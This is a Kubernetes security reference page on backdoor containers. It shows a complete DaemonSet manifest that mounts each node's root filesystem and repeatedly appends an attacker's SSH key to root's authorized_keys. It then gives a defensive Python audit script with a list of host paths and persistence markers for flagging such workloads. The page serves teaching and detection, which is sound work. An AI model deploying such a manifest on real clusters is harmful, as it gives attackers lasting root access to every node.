
Backdoor Container

Attackers run their malicious code in a container in the cluster. By using Kubernetes controllers such as DaemonSets or Deployments, attackers can ensure that a constant number of containers keeps running on one, or all, of the nodes in the cluster, even if individual pods are deleted.

Example

One of the simplest and at the same time most efficient ways to deploy backdoor containers is the use of a DaemonSet. The following adds the attacker's SSH key to the authorized_keys file on every node in the cluster every 10 minutes (600 seconds). As a DaemonSet automatically makes sure that a pod is deployed on each node, newly added nodes will also be compromised immediately when they become available.

apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: evil-daemonset
  labels:
    app: evil-daemonset
spec:
  selector:
    matchLabels:
      app: evil-daemonset
  template:
    metadata:
      labels:
        app: evil-daemonset
    spec:
      containers:
      - name: evil
        image: ubuntu
        command: [ "/bin/sh", "-c", "mkdir -p /host/root/.ssh && echo 'ssh-rsa AAAAB3NzaC1y...CUkwfwh+iSTP' >> /host/root/.ssh/authorized_keys && sleep 600" ]
        volumeMounts:
        - name: host
          mountPath: /host
      volumes:
      - name: host
        hostPath:
          path: /

Please note that this is a quick and dirty example only made for demonstration purposes and the authorized_keys file will be filled up over time.
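From the defender's side, the pattern above is easy to spot in manifests: a controller-managed pod (DaemonSet, Deployment, ...) that mounts a sensitive host path read-write and whose command touches host persistence files. The following audit script is an added example, not code from the original page or from any Kubernetes project. It works on already-parsed manifests (plain dicts, as yaml.safe_load or the API server would return them), so it runs offline; the sample manifests, the list of sensitive host paths and the persistence markers are constructed for the example and should be tuned to your environment.

```python
# Added example (not from the original page): audit parsed Kubernetes manifests
# for the backdoor-container pattern shown above (DaemonSet + writable hostPath).
# Manifests are plain dicts, so no cluster access and no PyYAML is needed.

CONTROLLER_KINDS = {"DaemonSet", "Deployment", "StatefulSet", "ReplicaSet", "Job", "CronJob"}

# Host paths a workload almost never needs; "/" is what the example above mounts.
# Constructed list for this example; extend it for your environment.
SENSITIVE_HOST_PATHS = ("/", "/root", "/home", "/etc", "/var/lib/kubelet", "/var/run/docker.sock")

# Substrings in a container command line that point at host-level persistence.
PERSISTENCE_MARKERS = ("authorized_keys", "/etc/cron", "/etc/systemd", "/etc/passwd", "/etc/shadow")


def _pod_spec(manifest):
    """Return the pod spec of a Pod, a CronJob, or any template-based controller."""
    kind = manifest.get("kind")
    spec = manifest.get("spec", {})
    if kind == "Pod":
        return spec
    if kind == "CronJob":
        return spec["jobTemplate"]["spec"]["template"]["spec"]
    return spec.get("template", {}).get("spec", {})


def _is_sensitive(host_path):
    """True if host_path is, or lies under, one of SENSITIVE_HOST_PATHS."""
    norm = "/" + host_path.strip("/")  # canonical form: "/", "/root/.ssh", "/etc"
    for p in SENSITIVE_HOST_PATHS:
        if p == "/":
            if norm == "/":
                return True
        elif norm == p or norm.startswith(p + "/"):
            return True
    return False


def audit_workload(manifest):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    kind = manifest.get("kind", "?")
    name = manifest.get("metadata", {}).get("name", "<unnamed>")
    spec = _pod_spec(manifest)
    findings = []

    # volume name -> host path, for every hostPath volume in the pod spec
    host_volumes = {v["name"]: v["hostPath"]["path"]
                    for v in spec.get("volumes", []) if "hostPath" in v}

    for c in spec.get("containers", []) + spec.get("initContainers", []):
        for vm in c.get("volumeMounts", []):
            host_path = host_volumes.get(vm["name"])
            if host_path is not None and _is_sensitive(host_path):
                mode = "read-only" if vm.get("readOnly") else "read-write"
                findings.append(f"{kind}/{name}: container '{c['name']}' mounts host path "
                                f"'{host_path}' at '{vm['mountPath']}' ({mode})")
        cmdline = " ".join(c.get("command", []) + c.get("args", []))
        for marker in PERSISTENCE_MARKERS:
            if marker in cmdline:
                findings.append(f"{kind}/{name}: container '{c['name']}' command references '{marker}'")

    if findings and kind in CONTROLLER_KINDS:
        findings.append(f"{kind}/{name}: a {kind} re-creates the pod automatically "
                        "(a DaemonSet on every node), so deleting the pod alone does not remove it")
    return findings


# Constructed sample: the DaemonSet from the example above, as a parsed dict (key truncated).
EVIL_DAEMONSET = {
    "apiVersion": "apps/v1", "kind": "DaemonSet",
    "metadata": {"name": "evil-daemonset"},
    "spec": {"selector": {"matchLabels": {"app": "evil-daemonset"}},
             "template": {"spec": {
                 "containers": [{"name": "evil", "image": "ubuntu",
                                 "command": ["/bin/sh", "-c",
                                             "mkdir -p /host/root/.ssh && echo 'ssh-rsa AAAA...' "
                                             ">> /host/root/.ssh/authorized_keys && sleep 600"],
                                 "volumeMounts": [{"name": "host", "mountPath": "/host"}]}],
                 "volumes": [{"name": "host", "hostPath": {"path": "/"}}]}}}}

# Constructed sample: a log shipper that legitimately reads (only) /var/log from each node.
BENIGN_DAEMONSET = {
    "apiVersion": "apps/v1", "kind": "DaemonSet",
    "metadata": {"name": "log-shipper"},
    "spec": {"selector": {"matchLabels": {"app": "log-shipper"}},
             "template": {"spec": {
                 "containers": [{"name": "shipper", "image": "example/log-shipper",
                                 "volumeMounts": [{"name": "logs", "mountPath": "/var/log",
                                                   "readOnly": True}]}],
                 "volumes": [{"name": "logs", "hostPath": {"path": "/var/log"}}]}}}}


if __name__ == "__main__":
    for m in (EVIL_DAEMONSET, BENIGN_DAEMONSET):
        label = f"{m['kind']}/{m['metadata']['name']}"
        for line in audit_workload(m) or [f"{label}: no findings"]:
            print(line)
```

The same checks translate directly into an admission policy (for example a Kyverno or OPA/Gatekeeper rule denying hostPath volumes outside an allow-list), which stops the manifest before a DaemonSet ever spreads it to every node; the script form is useful for scanning manifests in CI or for a one-off review of what a cluster already runs.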
